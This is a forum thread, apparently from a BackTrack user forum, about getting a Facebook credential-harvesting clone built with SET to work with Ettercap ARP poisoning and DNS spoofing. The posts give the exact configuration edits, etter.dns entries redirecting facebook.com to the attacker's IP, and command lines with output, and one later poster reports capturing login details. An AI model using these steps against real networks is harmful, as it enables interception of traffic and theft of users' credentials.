Thread: Ettercap won't redirect DNS spoofing

  1. #1

    Ettercap won't redirect DNS spoofing

    Distro: BT5 R3 , VM: VMware

    Hey guys. I've been testing Ettercap/SET on my own personal network and I've run into a problem: Ettercap doesn't seem to want to redirect the DNS spoof.

    SET seems to be working great:
    Code:
    Social-Engineering Attacks > Website Attack Vectors > Credential Harvester Attack Method > Site Cloner

    Then I get prompted with:
    IP address for the POST back in Harvester/Tabnabbing
    So I enter wlan0's IP address (192.168.1.4)

    If I go on another computer on the network and navigate to http://192.168.1.4 it works great. It looks just like Facebook and it even displays the POST results:

    Code:
    [*] WE GOT A HIT! Printing the output:
    POSSIBLE USERNAME FIELD FOUND: email=test
    POSSIBLE PASSWORD FIELD FOUND: pass=test

    The issue I'm having is with ettercap. I'll walk you through the steps I did:
    gedit /etc/etter.conf

    Then I verified that I changed ec_uid and ec_gid's values to 0 as well as removing the # before the re_dir lines under ip_tables:

    Code:
    [privs]
    ec_uid = 0                # nobody is the default
    ec_gid = 0                # nobody is the default
    
    # if you use iptables:
       redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
       redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    I went ahead and did the same thing for /usr/local/etc/etter.conf

    Next I cleared out the etter.dns file and put the following (/usr/local/share/ettercap/etter.dns):

    HTML Code:
    facebook.com A 192.168.1.4
    *.facebook.com A 192.168.1.4
    www.facebook.com PTR 192.168.1.4

    Finally I started ettercap:
    ettercap -T -q -i wlan0 -P dns_spoof -M arp // //

    Whenever I try to navigate to facebook.com on a client in my network, it actually directs to Facebook's page (https://www.facebook.com) as opposed to my SET clone (192.168.1.4). I tried changing it from facebook to other sites as well and nothing seems to get ettercap to redirect traffic. Again though, if I navigate to 192.168.1.4 on a machine on the network, it WILL go to the SET clone page and work correctly.

    I wanted to verify that I wasn't making any simple mistakes again, so I double-checked to make sure I was on the subnet (even though I knew I already was):

    arp-scan --interface wlan0 --localnet
    Code:
    Interface: wlan0, datalink type: EN10MB (Ethernet)
    Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
    192.168.1.1    00    (Unknown)
    192.168.1.3      (Unknown)
    192.168.1.5  (Unknown)
    192.168.1.15    (Unknown)
    192.168.1.13    (Unknown)
    192.168.1.5      (Unknown) (DUP: 2)
    192.168.1.3    4    (Unknown) (DUP: 2)
    192.168.1.15    (Unknown) (DUP: 2)
    192.168.1.13    (Unknown) (DUP: 2)

    I verified that all of the etter.conf and the etter.dns files were correct and reflect what I posted. I even tried manually adding the gateway IP instead of just using // // , as well as using the autoadd as opposed to dns_spoof

    ettercap -Tqi wlan0 -M arp:remote // /192.168.1.1/ -P autoadd
    Code:
    ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA
    
    Listening on wlan0... (Ethernet)
    
    wlan0 ->    XX:XX:XX:XX:XX:XX  192.168.1.4  255.255.255.0
    
    Privileges dropped to UID 0 GID 0...
    
      28 plugins
      40 protocol dissectors
      55 ports monitored
    7587 mac vendor fingerprint
    1766 tcp OS fingerprint
    2183 known services
    
    Randomizing 255 hosts for scanning...
    Scanning the whole netmask for 255 hosts...
    * |==>| 100.00 %
    
    3 hosts added to the hosts list...
    
    ARP poisoning victims:
    
    GROUP 1 : ANY (all the hosts in the list)
    
    GROUP 2 : 192.168.1.1 XX:XX:XX:XX:XX:XX
    Starting Unified sniffing...
    
    Text only Interface activated...
    Hit 'h' for inline help
    
    Activating autoadd plugin...

    Just like before, it's producing the same result. It's not performing an actual DNS spoof to any client on the network, however, if a client was to navigate to https://192.168.1.4 ("attacker") it works correctly. Any other ideas by chance? I've been trying to research this and doing different methods but I keep running into the same issue. Thanks guys, I really appreciate your time!

  2. #2

    Re: Ettercap won't redirect DNS spoofing

    Hey guys! I'm still a little new to Linux. I've been trying to find a way to update Ettercap because I've had an issue with DNS spoofing not working correctly. Another member suggested that I try this solution:

    Code:
    1) First get the ettercap from here.
    http://ettercap.sourceforge.net/downloads.html
    
    2) Untar it.
    tar -xzf ettercap-0.7.4.tar.gz
    
    3) Get the libnet from here.
    http://linux.softpedia.com/progDownload/...10275.html
    
    4) Untar libnet.
    tar -xzf libnet-1.1.2.1.tar.gz
    
    5) Cd to the extracted directory.
    cd libnet
    ./configure
    make
    make install
    
    libnet will be installed.
    
    6) Now let's install the dependencies for ettercap.
    apt-get install libgtk2.0-dev libpango1.0-dev
    
    7) After that cd to the ettercap directory.
    cd ettercap
    ./configure
    make
    make install
    
    If step #7 completed without any problems/errors then you are good to go.
    
    A restart is recommended

    The issue lies at step 6:

    apt-get install libgtk2.0-dev libpango1.0-dev
    Code:
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    Some packages could not be installed. This may mean that you have
    requested an impossible situation or if you are using the unstable
    distribution that some required packages have not yet been created
    or been moved out of Incoming.
    The following information may help to resolve the situation:
    
    The following packages have unmet dependencies:
      libgtk2.0-dev: Depends: libgtk2.0-0 (= 2.20.1-0ubuntu2) but 2.20.1-0ubuntu2.1 is to be installed
                     Depends: libxi-dev (>= 1:1.0.1-4) but it is not going to be installed
    E: Broken packages

    Even if I try to skip that step, after doing the ./configure, once I get to the "make" step in the ettercap folder I'm prompted with:
    root@bt:~/ettercap# make
    Code:
    make: *** No targets specified and no makefile found.  Stop.

    I would appreciate any advice. If I need to provide any information I'll be sure to post it here. Thank you very much for your help in advance!
    Last edited by Quieterror; 11-06-2012 at 09:03 AM. Reason: Mistype

  3. #3
    zimmaro

    Re: Ettercap won't redirect DNS spoofing

    Hi Quieterror,
    I DO NOT have the right answer!
    Also, I'm no expert... but if you want to try another good alternative:
    ARPing with Ettercap & spoofing with Dnsspoof.
    Bye

  4. #4

    Re: Ettercap won't redirect DNS spoofing

    Hi Guys!!

    I tried the DNS spoofing using social engineering attack - credential harvest - web attack - site cloner. I tried the attack with Facebook and I got my test Facebook username and pw and it worked. But when I try it again for the second time and type facebook in the browser, it is not loading the page; it said facebook spoofed to (my ip) but there is no result, and net connectivity disconnects after a few seconds. Any suggestions?
